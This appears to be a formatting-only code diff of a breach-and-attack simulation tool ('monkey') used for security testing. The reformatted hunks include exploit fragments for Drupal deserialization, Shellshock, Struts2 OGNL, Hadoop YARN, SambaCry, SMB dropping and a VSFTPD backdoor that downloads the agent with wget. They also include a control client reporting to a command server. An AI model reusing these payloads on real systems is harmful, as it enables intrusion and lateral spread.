STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
},
PRINCIPLE_KEY:PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
},
PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY:[PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_LOGGING:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found logging issues.",
STATUS_PASSED:"ScoutSuite found no logging issues.",
TEST_SCOUTSUITE_LOGGING: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found logging issues.",
STATUS_PASSED: "ScoutSuite found no logging issues.",
},
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SERVICE_SECURITY:{
TEST_EXPLANATION_KEY:"ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found service security issues.",
STATUS_PASSED:"ScoutSuite found no service security issues.",
TEST_SCOUTSUITE_SERVICE_SECURITY: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found service security issues.",
STATUS_PASSED: "ScoutSuite found no service security issues.",
},
PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY:[DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
@ -315,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
DATA:[],
PEOPLE:[],
NETWORKS:[],
DEVICES:[],
WORKLOADS:[],
VISIBILITY_ANALYTICS:[],
AUTOMATION_ORCHESTRATION:[],
DATA: [],
PEOPLE: [],
NETWORKS: [],
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: [],
}
PRINCIPLES_TO_TESTS = {}


@ -14,29 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value:"Monkey tried to load Mimikatz DLL, but failed.",
ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
ScanStatus.USED.value:"WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value:"Monkey tried to call WinAPI to load mimikatz.",
ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's "
"process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
" for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}


@ -18,8 +18,7 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.",
type=str
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
)
args = parser.parse_args()
print(get_version(args.build))


@ -52,13 +52,13 @@ class ControlClient(object):
has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {
"guid":GUID,
"hostname":hostname,
"ip_addresses":local_ips(),
"description":" ".join(platform.uname()),
"internet_access":has_internet_access,
"config":WormConfiguration.as_dict(),
"parent":parent,
"guid": GUID,
"hostname": hostname,
"ip_addresses": local_ips(),
"description": " ".join(platform.uname()),
"internet_access": has_internet_access,
"config": WormConfiguration.as_dict(),
"parent": parent,
}
if ControlClient.proxies:
@ -67,7 +67,7 @@ class ControlClient(object):
requests.post(
"https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=20,
@ -134,15 +134,14 @@ class ControlClient(object):
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return {}
@ -155,20 +154,19 @@ class ControlClient(object):
)
return
try:
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
@ -176,19 +174,18 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
telemetry = {"monkey_guid":GUID, "log":json.dumps(log)}
telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
requests.post(
"https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
@ -206,8 +203,7 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return
@ -238,16 +234,15 @@ class ControlClient(object):
requests.patch(
"https://%s/api/monkey/%s"
% (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({"config_error":True}),
headers={"content-type":"application/json"},
data=json.dumps({"config_error": True}),
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return {}
@ -287,7 +282,7 @@ class ControlClient(object):
else:
arch = "x86_64"
return {"os":{"type":os, "machine":arch}}
return {"os": {"type": os, "machine": arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@ -316,8 +311,7 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
@staticmethod
@ -333,7 +327,7 @@ class ControlClient(object):
"https://%s/api/monkey/download"
% (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict),
headers={"content-type":"application/json"},
headers={"content-type": "application/json"},
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -350,8 +344,7 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
)
return None, None
@ -435,7 +428,7 @@ class ControlClient(object):
def report_start_on_island():
requests.post(
f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({"started_on_island":True}),
data=json.dumps({"started_on_island": True}),
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)


@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {
"source_path":os.path.abspath(sys.argv[0]),
"destination_path":self.opts.location,
"source_path": os.path.abspath(sys.argv[0]),
"destination_path": self.opts.location,
}
def initialize(self):
@ -147,7 +147,7 @@ class MonkeyDrops(object):
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]}
MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
+ monkey_options
)
else:
@ -156,12 +156,12 @@ class MonkeyDrops(object):
# and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
+ monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
"monkey_directory":dest_path[0: dest_path.rfind("/")],
"monkey_commandline":inner_monkey_cmdline,
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
"monkey_commandline": inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(
@ -189,8 +189,7 @@ class MonkeyDrops(object):
try:
if (
(self._config["source_path"].lower() != self._config[
"destination_path"].lower())
(self._config["source_path"].lower() != self._config["destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):


@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {
"display_name":self._EXPLOITED_SERVICE,
"started":"",
"finished":"",
"vulnerable_urls":[],
"vulnerable_ports":[],
"executed_cmds":[],
"display_name": self._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
}
self.exploit_attempts = []
self.host = host
@ -76,12 +76,12 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
{
"result":result,
"user":user,
"password":password,
"lm_hash":lm_hash,
"ntlm_hash":ntlm_hash,
"ssh_key":ssh_key,
"result": result,
"user": user,
"password": password,
"lm_hash": lm_hash,
"ntlm_hash": ntlm_hash,
"ssh_key": ssh_key,
}
)
@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell})
self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})


@ -85,7 +85,7 @@ class DrupalExploiter(WebRCE):
response = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type":"application/hal+json"},
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
@ -105,7 +105,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type":"application/hal+json"},
headers={"Content-Type": "application/hal+json"},
verify=False,
timeout=LONG_REQUEST_TIMEOUT,
)
@ -171,20 +171,20 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
"_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type":{"target_id":"article"},
"title":{"value":"My Article"},
"body":{"value":""},
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
"link":[
"link": [
{
"value":"link",
"options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
@ -195,6 +195,6 @@ def build_cmd_execution_payload(base, cmd):
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
"_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}},
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload


@ -53,8 +53,8 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
"linux":WGET_HTTP_UPLOAD,
"windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
"linux": WGET_HTTP_UPLOAD,
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config


@ -64,8 +64,7 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
@ -75,8 +74,7 @@ class HadoopExploiter(WebRCE):
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
@ -93,8 +91,7 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
@ -102,22 +99,22 @@ class HadoopExploiter(WebRCE):
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
"monkey_path":path,
"http_path":http_path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id":app_id,
"application-name":name,
"am-container-spec":{
"commands":{
"command":command,
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
}
},
"application-type":"YARN",
"application-type": "YARN",
}
return payload


@ -200,8 +200,7 @@ class MSSQLExploiter(HostExploiter):
)
LOG.info(
"Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user,
self._config.hash_sensitive_data(password))
"SHA-512): {2}".format(host, user, self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)


@ -95,7 +95,7 @@ class SambaCryExploiter(HostExploiter):
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
self.exploit_info["shares"][share] = {"creds":writable_shares_creds_dict[share]}
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@ -118,10 +118,10 @@ class SambaCryExploiter(HostExploiter):
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
"username":creds["username"],
"host":self.host.ip_addr,
"port":self.SAMBA_PORT,
"share_name":share,
"username": creds["username"],
"host": self.host.ip_addr,
"port": self.SAMBA_PORT,
"share_name": share,
}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@ -195,8 +195,7 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@ -237,12 +236,12 @@ class SambaCryExploiter(HostExploiter):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = [
{"username":user, "password":password, "lm_hash":lm_hash, "ntlm_hash":ntlm_hash}
{"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds
]
# Add empty credentials for anonymous shares.
creds.insert(0, {"username":"", "password":"", "lm_hash":"", "ntlm_hash":""})
creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
return creds
@ -268,7 +267,7 @@ class SambaCryExploiter(HostExploiter):
pattern_result = pattern.search(smb_server_name)
is_vulnerable = False
if pattern_result is not None:
samba_version = smb_server_name[pattern_result.start(): pattern_result.end()]
samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True
@ -406,8 +405,7 @@ class SambaCryExploiter(HostExploiter):
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
str(location)
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
)
)


@ -29,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type":"() { :;}; echo; "}
_attacks = {"Content-type": "() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
@ -45,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
def _exploit_host(self):
# start by picking ports
candidate_services = {
service:self.host.services[service]
service: self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
@ -243,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(
url, headers={header:attack}, verify=False, timeout=TIMEOUT
url, headers={header: attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123
result = r.content.decode()
return result


@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
"139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445),
"139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
}
USE_KERBEROS = False
@ -119,7 +119,7 @@ class SmbExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path":remote_full_path
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -128,7 +128,7 @@ class SmbExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path":remote_full_path
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
)


@ -58,8 +58,7 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host,
ssh_string
"Successfully logged in %s using %s users private key", self.host, ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh


@ -48,7 +48,7 @@ class Struts2Exploiter(WebRCE):
@staticmethod
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent":"Mozilla/5.0"}
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers)
try:
return urllib.request.urlopen(
@ -85,7 +85,7 @@ class Struts2Exploiter(WebRCE):
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd
)
headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload}
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
try:
request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output


@ -26,12 +26,12 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":0}
dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":1}
dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result
)
@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]:{
"RID":int(RIDS[0]),
"lm_hash":LM_HASHES[0],
"nt_hash":NT_HASHES[0],
USERS[0]: {
"RID": int(RIDS[0]),
"lm_hash": LM_HASHES[0],
"nt_hash": NT_HASHES[0],
},
USERS[1]:{
"RID":int(RIDS[1]),
"lm_hash":LM_HASHES[1],
"nt_hash":NT_HASHES[1],
USERS[1]: {
"RID": int(RIDS[1]),
"lm_hash": LM_HASHES[1],
"nt_hash": NT_HASHES[1],
},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""},
USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""},
USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds


@ -32,8 +32,7 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
array2) == 2
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
)
assert test1 and test2


@ -60,12 +60,12 @@ class SmbTools(object):
return None
info = {
"major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
"major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
}
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@ -103,10 +103,10 @@ class SmbTools(object):
)
continue
share_info = {"share_name":share_name, "share_path":share_path}
share_info = {"share_name": share_name, "share_path": share_path}
if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),)
high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),)
@ -128,8 +128,7 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host,
exc
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
)
continue
@ -153,8 +152,7 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with "
"attack"
"Remote monkey file is found but different, moving along with " "attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@ -167,8 +165,7 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -181,8 +178,7 @@ class SmbTools(object):
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
exc
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
)
T1105Telem(
ScanStatus.SCANNED,
@ -228,9 +224,9 @@ class SmbTools(object):
return None, None
dialect = {
SMB_DIALECT:"SMBv1",
SMB2_DIALECT_002:"SMBv2.0",
SMB2_DIALECT_21:"SMBv2.1",
SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21: "SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked


@ -122,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path}
download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
@ -135,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
